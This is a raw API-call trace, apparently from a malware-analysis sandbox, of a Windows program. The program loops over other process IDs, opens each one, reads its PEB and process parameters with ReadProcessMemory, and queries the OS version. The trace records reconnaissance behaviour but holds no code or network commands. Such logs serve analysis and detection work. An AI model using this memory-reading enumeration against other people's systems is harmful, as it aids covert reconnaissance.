[0404.139] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.139] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.139] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.139] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x828c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.139] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x826de, lpBuffer=0x12dd100, nSize=0x50, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.141] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.142] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.142] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.142] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x81ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.142] malloc (_Size=0x58) returned 0x2b99b0
[0404.142] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x8272e, lpBuffer=0x2b99b0, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2b99b0*, lpNumberOfBytesRead=0x0) returned 1
[0404.143] free (_Block=0x2b99b0)
[0404.143] CloseHandle (hObject=0x240) returned 1
[0404.144] _ui64tow (_Value=0x310, _Buffer="772", _Radix=10) returned="784"
[0404.149] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="784") returned 3
[0404.150] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.150] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.173] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x310) returned 0x240
[0404.173] GetLastError () returned 0x0
[0404.173] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.173] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.173] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.174] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x622960, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.174] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x6226f6, lpBuffer=0x12dd100, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.175] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.176] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.176] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.177] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x621ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.177] malloc (_Size=0x82) returned 0x2c4740
[0404.177] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x622770, lpBuffer=0x2c4740, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.177] free (_Block=0x2c4740)
[0404.178] CloseHandle (hObject=0x240) returned 1
[0404.179] _ui64tow (_Value=0x754, _Buffer="784", _Radix=10) returned="1876"
[0404.184] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1876") returned 4
[0404.185] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.185] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.213] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x240
[0404.213] GetLastError () returned 0x0
[0404.213] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.214] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.214] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.214] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x6128f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.214] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x6126d8, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.215] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.217] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.217] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.217] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x611ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.217] malloc (_Size=0x68) returned 0x2c08e0
[0404.217] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x612738, lpBuffer=0x2c08e0, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c08e0*, lpNumberOfBytesRead=0x0) returned 1
[0404.217] free (_Block=0x2c08e0)
[0404.218] CloseHandle (hObject=0x240) returned 1
[0404.219] _ui64tow (_Value=0x444, _Buffer="1876", _Radix=10) returned="1092"
[0404.224] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1092") returned 4
[0404.229] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.229] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.252] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x240
[0404.252] GetLastError () returned 0x0
[0404.252] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.252] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.253] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.253] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5d2880, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.253] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5d26ce, lpBuffer=0x12dd100, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.254] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.260] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.260] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.261] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5d1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.261] malloc (_Size=0x44) returned 0x2bd180
[0404.261] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5d270a, lpBuffer=0x2bd180, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bd180*, lpNumberOfBytesRead=0x0) returned 1
[0404.261] free (_Block=0x2bd180)
[0404.262] CloseHandle (hObject=0x240) returned 1
[0404.263] _ui64tow (_Value=0x828, _Buffer="1092", _Radix=10) returned="2088"
[0404.267] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2088") returned 4
[0404.269] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.269] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.300] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x828) returned 0x240
[0404.300] GetLastError () returned 0x0
[0404.300] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.300] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.301] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.301] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2628e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.301] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2626e0, lpBuffer=0x12dd100, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.303] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.304] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.305] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.305] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x261ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.305] malloc (_Size=0x60) returned 0x2c0790
[0404.305] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x262738, lpBuffer=0x2c0790, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0404.305] free (_Block=0x2c0790)
[0404.306] CloseHandle (hObject=0x240) returned 1
[0404.307] _ui64tow (_Value=0x6e4, _Buffer="2088", _Radix=10) returned="1764"
[0404.312] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1764") returned 4
[0404.313] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.313] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.340] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6e4) returned 0x240
[0404.340] GetLastError () returned 0x0
[0404.340] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.340] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.340] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.340] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3828f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.341] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3826e4, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.342] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.343] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.343] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.343] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x381ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.344] malloc (_Size=0x62) returned 0x2c0790
[0404.344] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x38273e, lpBuffer=0x2c0790, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0404.344] free (_Block=0x2c0790)
[0404.345] CloseHandle (hObject=0x240) returned 1
[0404.372] _ui64tow (_Value=0x71c, _Buffer="1764", _Radix=10) returned="1820"
[0404.377] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1820") returned 4
[0404.378] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x236, dwBuildNumber=0x0, dwPlatformId=0x128260, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.378] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x240
[0404.401] GetLastError () returned 0x0
[0404.402] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.402] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.402] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.402] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x482920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.402] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4826f2, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.403] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.405] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.405] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.405] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x481ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.405] malloc (_Size=0x72) returned 0x2c4740
[0404.405] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x48275c, lpBuffer=0x2c4740, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.405] free (_Block=0x2c4740)
[0404.406] CloseHandle (hObject=0x240) returned 1
[0404.407] _ui64tow (_Value=0x738, _Buffer="1820", _Radix=10) returned="1848"
[0404.415] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1848") returned 4
[0404.416] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.416] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.440] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x240
[0404.440] GetLastError () returned 0x0
[0404.440] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.440] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.440] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.441] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x512910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.441] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5126ee, lpBuffer=0x12dd100, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.449] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.451] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.451] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.451] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x511ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.451] malloc (_Size=0x6a) returned 0x2c4740
[0404.451] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x512750, lpBuffer=0x2c4740, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.451] free (_Block=0x2c4740)
[0404.452] CloseHandle (hObject=0x240) returned 1
[0404.453] _ui64tow (_Value=0x830, _Buffer="1848", _Radix=10) returned="2096"
[0404.457] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2096") returned 4
[0404.459] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.459] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.483] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x240
[0404.483] GetLastError () returned 0x0
[0404.483] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.483] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
